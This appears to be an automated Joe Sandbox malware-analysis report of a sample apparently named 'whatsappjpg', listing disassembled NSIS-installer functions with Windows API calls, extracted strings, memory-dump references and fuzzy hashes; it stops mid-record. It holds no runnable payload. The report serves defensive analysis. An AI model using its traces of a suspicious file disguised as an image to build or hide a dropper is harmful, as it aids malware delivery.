SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

AB@, xrefs: 004044D6
open, xrefs: 004044D9
N, xrefs: 00404466

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$N$open
API String ID: 3615053054-4108209771
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Strings

[Rename], xrefs: 00405CE8, 00405CFA
p]B, xrefs: 00405C0B
peB, xrefs: 00405C55
NUL, xrefs: 00405C10
%ls=%ls, xrefs: 00405C74

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c8f8921d5db17dcea38d37436245cad2ed6acf29c8dc53bbb3a8225ee1bc969
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 004045C8 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(00427180,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,00427180), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

A, xrefs: 004046EB

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A
API String ID: 2246997448-3554254475
Opcode ID: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 9279281f82fbc7aa84ca95c74a32d54f8e3848aa2d1259afc6b0fcaac2342789
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 00402DBA Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNEL32(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNEL32(00000040,00409230), ref: 00402F7A

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Error launching installer, xrefs: 00402E0A
Null, xrefs: 00402EB3
soft, xrefs: 00402EAA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Inst, xrefs: 00402EA1

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00405F0A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00405192 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
